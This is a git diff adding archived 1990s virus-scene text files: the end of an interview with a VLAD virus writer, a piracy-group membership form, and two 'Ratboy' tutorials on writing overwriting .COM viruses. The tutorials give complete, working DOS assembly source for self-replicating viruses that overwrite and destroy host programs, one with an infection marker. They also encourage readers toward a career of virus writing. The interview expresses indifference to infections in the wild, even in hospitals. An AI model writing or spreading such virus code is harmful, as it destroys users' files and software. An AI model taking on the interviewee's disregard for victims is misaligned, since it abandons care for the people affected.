+ over-zealous magazine fans.
+
+-What do you think about viruses leaking in the wild?
+
+ Couldn't give a shit :-)
+
+-What responses have VLAD had concerning the VLAD zines?
+
+ We get plenty of fan-mail (when our email address is working), all of
+ which is positive, but in the newsgroups there is the occasional ignorant
+ person who objects to us.
+
+-Do you still remember who gave VLAD their first feedback?
+
+ You ? :-)
+
+-Do you think VLAD changed the vx-community in any way?
+
+ Anything we write influences the coding styles of many virus writers.
+
+ VLAD invented the windows executable infection technique that everybody
+ who wants to infect windows is using.
+
+-Why do you think VLAD got *a lot* of attention in the vx (av as well?)
+ pretty close after the first vlad-zine?
+
+ Did we ?  I sure didn't notice.. maybe it was our secret areas :-)
+
+ Nowadays, I think it is because of the quality of our viruses,
+ and they wonder what new things we will invent.
+
+-What is your opinion about your zines? (What do you like in them, what
+ are they missing?).
+
+ Issues 1 and 2 sucked, the rest were better.  In the last couple of issues
+ we didn't have many plain articles that anyone could read.  Most of the
+ stuff was so complex that few people could understand it.  We'd like to
+ fix that.
+
+-How do you think people will remember VLAD when the viruswriting
+ is dead?
+
+ As the worlds leading virus development group. (hope)
+
+-In the first Vlad-Zine, Metabolis said Vlad should be around until there
+ was no new techniques to discover conserning viruses, do you think this
+ ever will stop, or when do you think it will stop?
+
+ Probably after Win95 is infected.
+
+-How come you started coding assembly language?
+
+ To write viruses.
+
+-When did you start with viruswriting?
+
+ At the start of 1994.
+
+-What motivates you to write computer viruses?
+
+ I enjoy the programming techniques.  If anything was as much fun, I'd do
+ that instead.  Infecting people has nothing to do with my motivation.
+
+-Why did you start to write computer viruses?
+
+ I always wanted to write one, even before I knew anything about computers.
+ Viruses fascinated me, so when I got a computer that's what I devoted
+ myself to.
+
+-Did you write viruses before VLAD?
+
+ I wrote one lame direct action COM infector before VLAD.
+
+-After quite some time with viruses, what makes you go on?
+
+ Just the challenge.  One day I will get bored with it all and quit.
+
+-You have 'invented' a lot of new virus-techniques, which one was
+ the hardest to think of and the hardest to implement?
+
+ The windows NE infection, because reading the windows format is like
+ looking at hieroglyphics.  Every table points to another which is indexed
+ to a variable array, with a structure listed in table 2-6
+ except in the case where .. etc etc (you get my drift)
+
+-Any special viruses you have had a lot of good feedback from?
+
+ Winsurfer, MegaStealth, and I got some compliments from people
+ I respect about my Horsa virus.
+
+-How do you think the viruswriting future looks for Win95 and DOS?
+
+ The DOS future is as bright as ever, but Win95 waits to be conquered...
+
+-Which do you think is best polymorphic virus around ?
+
+ CPE-APE is excellent, if somewhat buggy.
+
+-How do you think a polymorphic virus/engine should be styled?
+
+ Anti-Heuristic, continuously changing registers as the
+ key/pointer etc, uses cryptanalytically sophisticated
+ encryption, different decryptor styles etc
+
+-Are you into other things in the underground-computing or just
+ viruswriting?
+
+ Just virus-writing.  The hack/phreak scene is packed with
+ lamers (even worse than the virus scene).
+
+-Has the scene in any way influented on your real life?
+
+ It taught me how to code better than my lecturers, so I get
+ better marks at university.
+
+-Would you feel guilty if one of your viruses made damage to a
+ hospital?
+
+ I would think about it for a while, but after that I wouldn't
+ worry about it.
+
+-Do you find it morally wrong to, write viruses, spread viruses
+ into the wild or share source-code?
+
+ None of them offend me, but I wouldn't spread viruses because
+ it's just a waste of time.  If someone else does, I couldnt
+ care less.
+
+-Which virus magazine do you like reading the most?
+
+ Probably 40hex because it is well written and has the best coders.
+
+-What do you think a virus-zine should include?
+
+ See VLAD 3-5 :-)
+
+-Which virus programmer do you admire (or like?)
+
+ Talon was always my idol as I was just starting out, because
+ he is intelligent and a good coder.
+ I like a number of the virus writers I know, and consider them my friends.
+
+-Which country do you consider the best/most active in viruswriting?
+
+ Australia!  We have more -active- coders than the USA at the moment.
+
+ Actually, Sweden, Russia, Italy, Taiwan and Holland are all
+ fairly good.
+
+-What do you think about these virus generators, such as VCL and PS-MPC?
+ What would you like to say to those using them?
+
+ I don't have a problem with them, although many virus writers
+ say that it degrades the art of coding.
+
+ Using creation labs is lame.  A person who uses them should
+ either write their own virus or spread a good undetectable one.
+
+-What do you think the future looks like for virus-generators?
+ Have you ever considered writing a generator?
+
+ Virus Generators will still be created, probably making
+ more complex viruses then previously.
+
+ I have thought about writing one before, but Metabolis
+ doesn't like the idea much, but it's still a possibility.
+
+-What do you think about the macro-virus which've appeared lately?
+ Do you think they'll start a new trend in viruswriting?
+
+ The new macro viruses are ok, but I will stick with assembly language.
+
+ As applications of that kind grow more complex it will become more
+ common.  Soon things like winword will resemble an operating system.
+
+-WW6.Nuclear could drop Ph33r that you had written, was you aware of this
+ when it got distributed into the wild?
+
+ I knew it.  When the author told me he was going to drop
+ ph33r, I was pleased.
+
+ Winword.Nuclear wasn't written by me!  Alot of people think
+ it was, but this is incorrect.  I did, however, write ph33r.
+
+-How would you define the word computer-virus.
+
+ A segment of code that copies itself around the place.
+
+-Describe the perfect virus:
+
+ COM/EXE/NE, no bugs, excellent polymorphism, good stealth.
+
+ Change 'NE' to 'PE' when win95 infection has been developed.
+
+-Is this type of virus around today?
+
+ No.
+
+-Describe the perfect viruswriter:
+
+ See : "priest"  (except for him letting his real name out).
+
+-Describe the AV-community with a few lines:
+
+ I respect people like Eugene Kaspersky and Frans Veldman who
+ are good progammers and provide quality products, but others are
+ lamers, who vye to out-do their fellow AV-ers in trying to
+ condemn virus writers.
+
+-Which AV-program do you think is the best and why?
+
+ AVP, because of it's excellent descriptions and polymorphism
+ detection.  It should fix up it's scanning speed and
+ user interface to become even better.
+
+-What do you think about the future for the underground?
+          (Like laws about H/P/V and stuff.. )
+
+ Banning virus writing wouldn't change a thing.
+
+ Couldn't care less about hacking or phreaking.
+
+-Do you think in someway viruswriting or spreading could be considered
+ a crime?
+
+ Spreading should be a crime, but not writing.
+
+ To prove someone was writing a virus, they'd have to install
+ a video camera and record you writing virus code, otherwise
+ you could just say you got the source off the net or something.
+ The government could abuse this and say anyone is a virus
+ writer as an excuse to invade their home.
+
+ So, banning virus writing would gain one or two convictions
+ (maybe) and stand the chance of being used as a tool in
+ totalitarianism.
+
+-Do you know/heard of any new technics coming in the near future?
+
+ Win 95 ?  And a polymorphic engine with layers and layers of
+ encryption.
+
+-Any advice to people who want's to learn the basic of virus-writing?
+
+ Get dark angels funky virus writing guides.
+
+-Can you be reached somewhere?
+
+ On irc as 'qark' and via email at the vlad email address.
+ Our homepage is at http://nether.net/~halflife/
+ Our magazines can be ftp'ed from:
+    ftp.netcom.com /pub/br/bradleym/Zines/VLAD
+    ftp.fc.net /pub/deadkat/virus/vlad
+
+-Are you kind enough to answer these two questions?
+
+ 1. How can you miss something you never had?
+ 2. How can you regret something you never did?
+
+ 1. If the need is self-evident.
+ 2. Inaction can be as bad as action.
+
+-Something else you wish to say but never had the opportunity to
+ say before?
+
+ Don't write viruses which have been done before. Do something new!
+
+-Do you wish to send any greets / goto hell messages?
+
+ Q the Misanthrope: VLAD got your message and we are glad you like us.
+ All your viruses are pretty cool (although your code is somewhat
+ unreadable).  Get an internet account!  Most virus writers meet on
+ irc nowadays.
+
+ Thanx to pb for all the internet axs he gives me :-)
+
+================================================================================
diff --git a/textfiles.com/virus/rab_mem.apl b/textfiles.com/virus/rab_mem.apl
new file mode 100644
index 00000000..2370ced8
--- /dev/null
+++ b/textfiles.com/virus/rab_mem.apl
@@ -0,0 +1,139 @@
+============================================================================
+Fill-out this form, rename the file to yer name and zip it. Then Upload yer
+application in Privite to TGS.    Thanx......ProTurbo - Sysop of The G Spot 
+============================================================================
+
+Before you start filling out the application, make sure that you
+are very serious about it. All I'm saying is do not waste my time.
+
+
+            M E M B E R S H I P  A P P L I C A T I O N   F O R M
+            ----------------------------------------------------
+
+Which position are you applying for:
+
+[] - RABID Courier
+[] - RABID Programmer
+[] - RABID QC/R&D
+[] - RABID Spy
+[] - RABID Site
+
+
+1. What is yer alias?
+
+______________________________________________
+
+
+
+2. What is yer real name?
+
+______________________________________________
+
+
+
+3. Give me a number and a time so we can talk voice.
+
+______________________________________________
+
+
+
+4. How Long have you been pirating?
+
+______________________________________________
+
+
+
+5. How old are you and what do you do for a living.
+
+______________________________________________
+
+______________________________________________
+
+
+
+6. Name 3 users for references.
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+
+
+7. Are you affiliated with any group. If YES name them.
+
+______________________________________________
+
+______________________________________________
+
+
+
+8. Which programing skills do you have and how long have 
+   you been programming?
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+
+
+9. Are you a Sysop?, If so name yer board, number and everything else. 
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+
+
+10. Name Pirate/PD boards with numbers yer on.
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+
+
+11. Did you ever write a virus?, if so name them.
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+
+
+12. Do you call LD?
+
+______________________________________________
+
+______________________________________________
+
+
+
+13. Specifically where did you hear about RABID. Be very specific.
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+______________________________________________
+
+
+
+
+Well that's it, I would also like for you to write me a letter 
+about you and why you want to joing RABID.
+
+Also write anything else that you think may help yer application.
\ No newline at end of file
diff --git a/textfiles.com/virus/ratboy-1.txt b/textfiles.com/virus/ratboy-1.txt
new file mode 100644
index 00000000..9d6c36f1
--- /dev/null
+++ b/textfiles.com/virus/ratboy-1.txt
@@ -0,0 +1,294 @@
+ /\---/\     RATBOY'S OVERWRITING VIRUS TUTORIAL
+( .   . )
+ \     /     WARNING: The information contain within here can be
+  \   /      ^^^^^^^  dangerous to you mind and computer!!!!!!!!
+   \*/                I assume no responsiblity!!!!!!!!!
+    #
+
+        Well here it is my first instructional tutorial.  I felt it was
+nesscary for this file since I could not find any tutorials that taught 
+virus writing from the basic overwriting virus.  Well that's how I started 
+and now I want to show you.  So that you too can have a long and fruitful
+life of codeing viruses.  :)
+
+                        OVERWRITING VIRUSES
+
+-=What is an overwritting virus?
+
+I'm glad you asked that.  :)  An overwriting virus is a virus that reproduces
+by overwriting the first parts of a program with itself.  Here is an example:
+
+                +-------------------------+        (I got this example from
+                |    P R O G R A M        |         40Hex, thanks P/S!!!!)
+                +-------------------------+
+                         plus:
+                +--------+
+                | VIRUS! |
+                +--------+
+                         equals:
+
+                +--------+----------------+
+                | VIRUS! | G R A M        |
+                +--------+----------------+
+
+        As you can see the first part of the program was overwritten with 
+the virus code.  Since important parts of the original program are  
+effectivly destroyed it won't ever run, but the virus code will.  
+As you can guess overwriting viruses are very destructive and not very 
+productive.  But you must learn to walk before you can do the Polka!!
+
+
+-=So what does one need to know to write an overwriting virus?
+Another question I'm glad you asked.  :)  Well having a basic knowledge in 
+Assembly is a must, but it is not very differcult.  As a virus writer, I 
+only know one programing language, Assembly.  I didn't even learn BASIC.
+So don't listen to those that say don't learn Assembly, it's a wonderful
+programing language.  At the end of this file I'll be recomending books and
+things to do to help ya on your way to Assembly and virus writing.
+
+        Well let's get down to codeing!!!!  :)
+We will be dealing with .Com files.  So here is the basic setup for a .Com
+file in an Assembly source file:
+-----------------------------------------------------------------------------
+        CODE    SEGMENT
+        ASSUME  CS:CODE,DS:CODE         ;in .Com files the data, code, extra
+                                        ;and stack segments are all the same.
+        ORG     100H                    ;this is where all .Com files start
+                                        ;in memory.  This allows room for the
+                                        ;PSP.
+STARTVX PROC    NEAR
+
+        blah!                           ;all your virus body goes here
+        blah!
+        blah!
+STARTVX ENDP
+        blah!                           ;all your 'db's go here etc..etc...
+CODE    ENDS
+        END     STARTVX
+-----------------------------------------------------------------------------
+        
+See the set up isn't really hard to follow, but the lack of info in that 
+example can be confusing.  We'll get to a full Virus source code a little
+later.
+        Now what is the basic setup for a simple overwriting virus?  Well
+let's look at the order of operations:
+
+(1)     find a file
+(2)     open the found file
+(3)     write the virus to the opened file (infect it)
+(4)     close the file
+(5)     exit
+
+Well as you can see there is nothing but pure replication functions in this 
+setup.  Well I wanted it to be easy and not to boog you down with encryption,
+id bytes, etc...  We are dealing with ZEN and the art of basic viruses!
+
+Here we go looking at these steps of an simple overwriting virus:
+
+(1) FIND FIRST FILE!         
+the inputs:
+      
+        AH: 4EH
+        CX: FILE ATTRIBUTES
+        DX: OFFSET ADDRESS OF FILE NAME
+        DS: SEGMENT ADDRESS OF FILE NAME
+
+Now let's see how we would put this into our little program:
+
+        mov     ah,4eh                    ;find first service
+        mov     cx,0000h                  ;we 0'ed cx for normal files
+        mov     dx,offset star_com        ;the file mask for .Com file
+                                          ;you'll see 
+        int     21h
+;now of course when you said star_com you need to tell the Assembler what
+;you are talking about.  Here it is:
+
+star_com:       db      "*.com",0
+
+;ya see how it will work.  With the use of the wild card '*' the first file
+;that has the ending of .com will be found.  This is easy isn't it?
+
+        Now you can see that we didn't need to touch DS: since CS=DS=ES=SS.
+So the Star_com already was in the Data Segment.  Yay!!!!!  Love em .Com 
+files.  Sorry need to get back on track.
+
+        Now before we can go on and talk about open a found file for writing
+to(infecting), we must talk about the Disk Transfer Area (DTA).  When you 
+find that first file, information about the file found goes into the DTA,
+everything from file name to date of creation.  Here's the setup:
+
+        0h      db      21 dup(0)  ;reserved for DOS uses
+        15h     db      00         ;file attributes
+        16h     dw      0000       ;file time
+        18h     dw      0000       ;file date
+        1ah     dd      00000000   ;file size
+        1eh     db      13 dup(0)  ;asciiz of the file name.
+
+        That is the layout of the DTA.  Now the DTA lies in the PSP.  The
+first 256 (100h) bytes infront of the .Com file.  It's address is 80h.  
+Most of the time in virus writing, you would want to move the DTA to a 
+location where you can manipulate it without possbile messing up the PSP.
+Well for our case, with a simple overwriting virus, we don't need to worry.
+All we are going to do is read from the DTA, the file name we just have 
+found.  Now this is how we will address the file name, now we know that 
+the DTA starts at 80h, and we know that at 1eh from the DTA's begining is
+the asciiz of the file name.  So we just add them together and see what we 
+get, 80h + 1eh = 9eh.  Well that is were it's located, now let's move on
+to the next step.
+
+(2) OPENING THE FOUND FILE!
+the inputs:
+
+        AH: 3DH
+        AL: 00H    ;opened for reading only
+            01H    ;opened for writing only
+            02H    ;opened for both reading and writing
+        DX: OFFSET ADDRESS OF THE FILE NAME
+        DS: SEGMENT ADDRESS OF THE FILE NAME
+
+outputs:
+        AX: FILE HANDLE
+
+Now look at it setup in the format we need to know.
+
+        mov     ah,3dh         ;open file
+        mov     al,02h         ;open it for reading and writing
+        mov     dx,9eh         ;remember this is where the name in the DTA
+        int     21h
+
+Now Dos services will return a file handle of the file we just opened.  The 
+file handle is nothing more than a number that dos uses to know where it
+will read from(the file) or write to(the file).  We don't want it in AX
+since the next step that you will see we need it in BX.  Here's a easy way
+to move it:
+        
+        xchg    bx,ax          ;that will put the file handle into bx in one
+                               ;step!!!
+
+Ok now the down and dirty stuff.  Infecting the file we just opened. Ha ha!
+
+(3)WRITING TO THE OPENED FILE(INFECTING)
+the inputs:
+
+        AH: 40H
+        BX: FILE HANDLE
+        CX: BYTES TO WRITE
+        DX: OFFSET OF ADDRESS OF THE BEGINING OF THE VIRUS
+
+Here we go again with seeing what it will look like:
+
+        mov     ah,40h
+        mov     cx,offset endvx - offset startvx ;this will find the virus
+                                                 ;lenth, how many bytes to
+                                                 ;write....
+        mov     dx,offset startvx                ;where the virus starts
+        int     21h
+
+Ahhhhhhhhh!  I always feel so relaxed after reproducing....ahh.hh...h!
+Oh...where was I, a...well now that we have copied the virus to the file,
+now we can close it up.
+
+(4)CLOSE THE FILE! ;Whata-ya live in a barn!
+the inputs:
+        AX: 3EH
+        BX: FILE HANDLE
+      
+        Now before we go on remember how after we opened the file that we
+put the file handle in BX.  So since we didn't mess with BX we should just
+have to:
+
+        mov     ah,3eh
+        int     21h
+
+        Now for the final and last step the exiting.  Here ya go:
+(5)EXIT!
+
+        int     20h
+
+        Well I know it isn't really pretty, but it works.
+Well let's look at how all of it fits together:
+
+-----------------------------------------------------------------------------
+Code    Segment
+        Assume CS:code,DS:code               
+        Org     100h                         
+
+startvx proc    near
+        
+        mov     ah,4eh
+        mov     cx,0000h
+        mov     dx,offset star_com
+        int     21h
+
+        mov     ah,3dh
+        mov     al,02h
+        mov     dx,9eh
+        int     21h
+
+        xchg    bx,ax
+
+        mov     ah,40h
+        mov     cx,offset endvx - offset startvx
+        mov     dx,offset startvx
+        int     21h
+
+        mov     ah,3eh
+        int     21h
+
+        int     20h
+
+startvx endp
+
+star_com:       db      "*.com",0
+
+endvx   label   near
+
+code    ends
+        end     startvx
+
+-----------------------------------------------------------------------------
+        Sorry I didn't put comments in, but that was done so that if you can
+not read along and follow what is going on.  You need to re-read this file,
+and practice more Assembly.
+
+-=Now that I know overwriting virus programing what can I use them for?
+Another fine question.  :)  Overwriting viruses are simple, and being simple
+they are fairly easy to follow and program.  That in it's self will help 
+educate you in the basics of a virus, writing, reading, find file, etc....
+Also since it's fairly easy to write up an overwriting virus you can use them
+as test platforms for other routines.  Formating HD's, visual displays, 
+encryption, etc.....  This is so that you can concentrate on the how 
+the test routine will work not the virus.
+
+-=Now that I have the basics, is that all I need?
+OH No, there are many things that you need, the knowledge being the hardest.
+Read Assembler Inside and Out, and Using Assembly, they're really good books.
+You need, an Assembler(A86+TASM), lot's of source codes to learn from(some
+included).  It just dosen't stop there, you will need a some really good 
+virus scanners to track what your virus is doing.  F-prot and Tbav are 
+great, but if you come up with a virus that is unscannerable they won't work.
+That's why I highly recommend INVIRCIBLE.  It will protect you from real 
+screw ups, track your virus movement, even unscannibles, even protect you 
+from your 'friends' viruses on you computer >:>.  It's the best anti-virus
+protection out there, you need to know your enemy, and it's a powerful tool.
+The biggest and most important thing you can have is people that are helpful
+enough to take the time to answer the questions that form in your mind.  You
+will see some of those people in the closing credits of this file.  Talk to
+them.  
+
+        Now you are on to a long and fruitful life of making your
+        own viruses.  Remember pratice, ask questions, read and
+        of course have fun!!!!!!!
+
+*****************************************************************************
+
+Now I would like to take the time to thank a few people:
+
+-=*God, for making me possible
+-=*My Wife, for putting up with me!!
+-=*FC, thanks for all the info and help, dude!!!
+-=*Invircible, yea I know it's a piece of software, but it has covered my but
+   enough times.  Thanks Mike!!!!!!!!!!!!!!!!!
+-=*Aristotle, yea Aristotle, the dude help start me out.
+-=*Vlad, Immortal Riot, NuKE, Falcon, P/S, Mad Arab, Terminal Velocity..etc..
+
diff --git a/textfiles.com/virus/ratboy-2.txt b/textfiles.com/virus/ratboy-2.txt
new file mode 100644
index 00000000..57c460ae
--- /dev/null
+++ b/textfiles.com/virus/ratboy-2.txt
@@ -0,0 +1,404 @@
+ /\---/\       RATBOY'S OVER WRITTING VIRUS TUTORIAL #2
+( .   . ) 
+ \     /       WARNING: Information Contained Within Can Eat Both Your
+  \   /        ^^^^^^^  Mind, Hard Drive and your dog.  
+   \*/                  I assume no responsiblity!!!!!!
+    #
+
+     Hello everyone!!!!  Considering I have gotten positive responses about 
+Ratboy#1 I decided to continue on with your lessions in simple viruses.
+So what is in store for this issue?  We will be going over some terms to 
+help us in this issue.  Also, we will move on to more complex overwriting
+.Com viruses. If you read and understood Ratboy#1, you should understand 
+how to due simple file operations.  Such as, you need to open the victum 
+for reading and writing, and  if you are a ATF agent you need to open the 
+file to shoot it in the back like it was one of your own agents.  You will 
+read how to read from your file, write to it, "tag" it, and more helpful 
+example code to help with your further learning of viruses. :)  Yea!!
+
+Now the boreing parts:
+
+What is a JMP (jump)?
+        A jump is kinda like what it sounds like, a jump.  Since we know 
+        that an assembly source reads top to bottom, sometimes we need to 
+        skip around in a program depending on the situation. Here's a simple 
+        example:
+
+                call    delta_offset
+        delta_offset:
+                pop     bp
+                sub     bp,delta_offset
+                jmp     restore  ;<===this is a jump :) 
+        eat_hd:
+                "blah"
+                "blah"
+        
+        As you can see, in the example, we jumped over eat_hd and anything 
+        else that was between the jump and restore.  A real simple 
+        explanation of how a jump works is like this.  A jump when put 
+        together by the assembler, well be converted to a jump without 
+        the label but a displacement.  Like this:
+
+        jmp     anywhere     
+        
+        Really means jmp  45 bytes 
+        
+        As you can see the number is postive so it a foward jump (negative
+        would be backwards).  Now I think I'm getting too far, I just wanted
+        you to understand it's a displacement.  I'm not even going into 
+        conditional jumps since I did say in the Ratboy#1 you do need to 
+        understand Assembly.  I know a lot of this should be old hat, but 
+        bare with me for now.  :)
+
+I was recently asked what is a CALL?
+        A call is like a jump with a return address.  When a Call is made,
+        the next line offset(address) is pushed into the stack, and a jump
+        to the place called is made.  Once there, you can return by using
+        RET.  This RET will pop the return address off the stack and jump 
+        there.  
+        Simple example:
+
+                mov     al,02h
+                call    mov_ptr  ;<==the next line's address it put into
+                                 ;the stack (that would be eat_hd) and a 
+                                 ;jump is made to mov_ptr
+        eat_hd:
+                "blah"
+                "blah"
+                "blah"
+                jmp     exit     ;<==simple review, how does this work?
+
+        mov-ptr:
+                "blah"
+                "blah"
+                "blah"
+                ret              ;ah..now the return address(eat_hd) is 
+                                 ;popped off the stack and a jump is made 
+                                 ;to it
+
+Another question was what is an OFFSET?
+        Since we are so far just dealing with .Com files make this real 
+        simple.  An offset is like an address.  If you know where you live,
+        then you understand how and address works.
+        Simple Simple Example:
+
+        Where does Debby live?  
+        Oh, on 16th St. and 5th Ave.  (that is an example of an Offset)
+        Review:
+        Where does Debby live?
+        Oh, go down three blocks and the third house on the left.
+        (this is an example of a jump, see the displacement?)
+
+Another question is what is LEA?
+        LEA stands for Load Effective Address.  Yarn!  Too technical.  Here's
+        how it works.  Remember in Ratboy#1 when looking for a file, you 
+        needed to load the file type(*.com) offset into dx, like this:
+        
+        mov     dx,offset file_type
+
+        well you can do this instead:
+
+        lea     dx,file_type
+
+        Nuff said.  Practice with it, see its ranges of use.
+
+Ok I know some one must have fallen asleep, if this bores you just go ahead
+and read Dark Angel's Virus Writing Guides, maybe they are up to speed with 
+you.
+
+How can I speed up my programs?
+        Simple, kinda think of speed as being the least amount of bytes 
+        nessary for you to carry out the job.  
+        example:
+
+        mov     ax,0   ;3 bytes
+        sub     ax,ax  ;2 bytes
+        
+        So which one would you figure to be the faster.  I used sub ax,ax
+        since I don't want to even go into explaining XOR, but XOR AX,AX 
+        will do the samethin.  Do some reading up on it, you'll need it for
+        encryption later on in your virus writing carreer.  The Sub should 
+        make sense, subtract a number from itself = 0.
+
+        Also here's another way of putting what is AX in BX.
+        
+        Instead of saying:
+        mov     bx,ax  ;2 bytes
+        
+        say:
+        xchg    bx,ax  ;1 byte
+
+        Ya get it?
+
+Now down to the exciting part of doing something.  Yea!!!!
+
+Ok in the last issue if you made your virus and you noticed that it infected
+the first file and not any others, that's because it was real simple.  This 
+time we will teach your little life form how to determine if the file is 
+already infected.  Now how do you make sure you know which underwear are 
+your's at summer camp, your mom sewed your name inside of them.  If you are
+over 30 and your mom still does this, you are a geek.  No arguements, you are
+a Geek.
+
+Ok, we need to put in, the infected file, some type of marker, so that we 
+can later read it.  Let's keep this simple, since ofcourse that's the motive 
+of this tutorial.  I will use the letter "r" for RaTBoY.  We will put
+that "infection marker" right after the jump.  So it will kinda look like 
+this:                
+        virus_start:  
+                jmp     find_first
+        me      db      'r'
+        find_first:
+                "blah"
+                "blah"
+
+Ya see it?  Now we will go on.  Since to do it all you have to do is put the
+Me    db   'r' in the front of your virus.  Now we need to put that jump in
+there, for the file to go over the 'r' and start looking for the file. All 
+the virus needs to do is read the first four bytes of a file, and check if 
+the 4th (jmp + offset = 3bytes) byte to identify if it's already infected.
+
+Now let's look at the order of operations.  For you english majors this is 
+outline.  :)
+
+
+(I)    find file
+       (a)no files to infect...EXIT
+(II)   open file for reading 
+(III)  read first four bytes
+(IV)   close file
+(V)    compare to id byte(infection marker)
+       (a) if infected already: 
+            1. setup to find next file
+            2. goto step I
+       (b)  if not infected continue on
+(VI)   open file for read/write
+(VII)  write self to file 
+(VIII) close file
+(IX)   exit
+
+Now that should not be such a differcult virus to make.  Some of this 
+material will be review for you and a chance to see if you can still 
+understand everything clearly.
+
+-=Step I=-
+  ~~~~~~
+Now of course we need to find the first file.  Here are the required inputs:
+
+        ah = 4eh
+        cx = atributes
+        dx = file type (ie. *.com)
+        int  21h
+
+if the carry flag is set then there were no files, so if:
+        jc      exit  ;jump to exit if no files
+not bad if you can remember this off the top of your head.  I think I went 
+over this well enough in Ratboy#1, so not to bore you I go on.
+
+-=Step II=-
+  ~~~~~~~
+Now we need to open that file to read and write to it.  Inputs are:
+
+        ax = 3d00h               ;remember the value of AL will setup 
+                                 ;for the access you want
+                                 ;al = 00h(read only)
+                                 ;al = 01h(write only)
+                                 ;al = 02h(read/write)
+        dx = offset address of file name
+        int 21h
+Returns:
+        ax = file handle (or error code..nah can't happen)
+
+Now do you remember where we get that file name?  Why of course  you know 
+this, it's in the DTA.  Now since we didn't mess with it, it should be
+at 80h in the Program Segment Prefix (PSP).  So if you know that and you've 
+read Ratboy#1 where do we look for the address of the file name?
+That's right 9eh.  Remember to put the file handle in BX where we will use it
+later(ie. xchg bx,ax)  Since we went over this in Ratboy#1 we'll go on.
+
+-=Step III=-
+  ~~~~~~~~
+Now comes something new.  We will read the first four bytes of the victum 
+file, and put it in our buffer, HOLDN_PLACE.  Here's the function's inputs:
+
+        ah = 3fh
+        bx = file handle
+        cx = bytes to read
+        dx = offset of buffer(buffer = the place you put the read byte(s))
+        int 21h
+
+Here's how it would look in your virus:
+***Remember that at the end of step two we put the file handle in bx***
+
+        mov     ah,3fh
+        mov     cx,4
+        lea     dx,holdn_place
+        int     21h
+
+and ofcourse at the end to the virus:
+holdn_place    db      ?,?,?,?
+
+-=Step IV=-
+  ~~~~~~~
+Close up the file.  So if it's infected, we just move on.  If the file is not
+infected, we open it up for read and write access.  Inputs:
+        
+        ax = 3eh
+        int 21h
+
+Simple enough?
+
+-=Step V=-
+  ~~~~~~
+Now we will compare the four bytes of the possible victum to the id byte.
+
+        cmp     byte ptr [holdn_place +3],'r'    ;told ya I would use a 'r'
+        jnz     open_it_again            ;if not same then time to infect
+        mov     ah,4fh                   ;now we set up ah with 4fh(find next)
+                       ;we could use a whole new find file routine but we will
+                       ;use the the one from find first, just that now ah=4fh
+                       ;if that confused you read the source for the setup.
+
+-=Step VI=-
+  ~~~~~~~
+Now since it passed the test of not being infected, just reopen it.
+This time so we can write to it.  :)  Then inputs:
+
+        ax = 3d02h
+        dx = offset of file name
+        int 21h
+
+Just to go over it one more time here's what it will look like:
+        
+        mov     ax,3d02h
+        mov     dx,9eh          ;That's where the file name is in the DTA
+        int     21h
+        xchg    bx,ax           ;remember to put that file handle in BX  :)
+
+-=Step VII=-
+  ~~~~~~~~
+Of course this write to victum part should be real old hat for ya, since 
+this is the part that seperates a lame trojan from a |< 00\_ virus.
+write to file inputs:
+
+        ah = 40h(hey isn't that a magazine?)
+        cx = number of bytes to write(size of virus)
+        bx = file handle(victum)
+        dx = offset address of buffer(beginning of virus)
+
+If unfamiliar with writing to file, just wait and look over the source at 
+the end of this file. 
+
+-=Step VIII=-
+  ~~~~~~~~~
+Close file....sorry if this is getting repetative, but that is the sign of 
+you learning how to do this real well.  Inputs:
+
+        ah = 3eh
+        bx = file handle(victum)
+
+-=Step IX=-
+  ~~~~~~~
+Exit.  Here's a real easy way:
+        
+        INT     20h
+
+Well that is enough of that piece by piece construction.  Let's look at the 
+finish part.
+
+;Ratboy tutorial over writer #2 virus
+
+code    segment                 ;these part should look familar
+        assume  cs:code,ds:code      
+        org     100h
+virus   proc    near
+
+virus_start:
+        jmp     find_first
+        db      'r'             ;there's that id byte
+
+find_first:                     ;load ah with 4eh for finding first
+        mov     ah,4eh          ;file like the file_type
+
+find_file:
+        xor     cx,cx           ;this put a 0 in cx, remember? The 0
+                                ;means look for normal attributes
+        lea     dx,file_type    ;sets up for what type of file we're
+                                ;looking for, *.com
+        int     21h
+        jc      exit            ;no files, time to leave.
+
+open_file:
+        mov     ax,3d00h        ;open file found for reading from.
+        mov     dx,9eh          ;the file name is in the DTA
+        int     21h
+        xchg    bx,ax           ;remember that ax will return with the file
+                                ;handle, and we need that is bx  :)
+read_file:
+        mov     ah,3fh          ;read file
+        mov     cx,4            ;four bytes
+        lea     dx,holdn_place  ;that's where it's going.... ;)
+        int     21h
+
+close_it_up:
+        mov     ah,3eh          ;just like it says
+        int     21h
+
+compare:
+        cmp     byte ptr[holdn_place + 3],'r' ;check if there is a 'r'
+        jnz     open_it_up_again              ;not there ok let's infect
+
+        mov     ah,4fh          ;ok let's setup to look for another file
+        jmp     find_file       ;ah..you see how we will be using find_file
+                                ;but this time ah=4fh not 4eh.  See how it's 
+                                ;different, but the same.
+open_it_up_again:
+        mov     ax,3d02h        ;Alright, we have a live one here!!!!
+        mov     dx,9eh          ;let's get that file name again
+        int     21h
+        xchg    bx,ax           ;yup, once again.
+
+infect: 
+        mov     ah,40h
+        mov     cx,offset endvx - offset virus_start 
+                                ;the end minus the beginning gives the lenth 
+                                ;of the virus. #of bytes to write.
+        lea     dx,virus_start  ;the virus's begining so this tells where to
+                                ;to start writing from and bx contains the 
+                                ;file handle, where to write to.
+        int     21h
+
+close_victum:
+        mov     ah,3eh          ;now let's close up the victum 
+        int     21h
+
+exit:   int     20h             ;time to exit, later!!!
+
+file_type       db      "*.com",0
+holdn_place     db      ?,?,?,?
+endvx           label   near
+virus   endp
+code    ends
+        end     virus_start
+
+I really do hope that this tutoral has been helpful to you.  Remember if you       
+find this boring.  Then you know enough write effective overwriting viruses,
+and you should move on to other types of virus.  
+
+Now remember the best teacher in virus writer is yourself practicing.  So if
+you want to try something different, try it.  Just don't do it in your DOS 
+directory.  :)
+
+Also Included with this file: sources to overwriters and Ratboy viruses.  
+You still need an Assembler, Bait files, a good reference book and not 
+to forget good people to ask a lot of dumb questions to.  Like I do.  :)
+
+Of course that usual ending where I thank all those that have helped me:
+
+-=GOD: I woke up breathing today.  :)
+-=Mrs. Ratboy: For putting up with me  ;) 
+-=FC:  For all the help dude!!!!!!!!!!!!
